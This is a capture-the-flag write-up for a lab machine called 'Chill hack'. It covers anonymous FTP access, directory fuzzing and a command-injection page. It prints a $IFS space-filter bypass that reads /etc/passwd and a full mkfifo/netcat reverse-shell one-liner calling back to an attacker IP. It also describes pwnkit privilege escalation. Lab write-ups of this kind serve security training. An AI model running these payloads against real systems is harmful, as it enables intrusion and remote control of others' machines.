Chill hack
Difficulty = easy
Os = linux
LINK
Hi guys ,
letās root another fun box today š„š„.
letās get startedš¤š¤.
Nmap scan
As you can see we have 3 open ports which port 21(FTP) Allows anonymous login.
so letās enumerate the port further by connecting to the ftp server using āanonymousā as username and hitting enter to get logged in. Then download the file on the server to your local machine
so, letās check the content of the downloaded file
the file contains hint to the box.
letās proceed further by fuzzing for directories using ffuf
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.10.85.120/FUZZ
got the directory /secret
visiting the directory we can tell that the box is about command injection šš
so, you can confirm it by executing the id command
proceeding further we noticed that our commands aināt working due to some kinda filters
i found out that spaces get filtered and thereby triggering the alert.
so, letās bypass the filter using the āinternal field separatorā $IFS
cat$IFS/etc/passwd should work
dope! it has been bypassed. which means we have to replace the spaces with $IFS
letās pop our sweet reverse shell by starting netcat listener and executing this commands.
rm$IFS/tmp/f;mkfifo$IFS/tmp/f;cat$IFS/tmp/f|/bin/sh -i 2>&1|nc 10.9.3.145 1337 >/tmp/f
cool we have a shell xD
so, stabilize the shell.
Privilege escalation
Enumeration shows that the machine is vulnerable to pwnkit
using
uname -a
to confirm
so, letās move the pwnkit exploit to the box and run to gain root link
we able to cat the user and root flag
thatās the unintended way to gain root
so letās go the intended way:
bankai senbonzakura kagyeoshi lol šš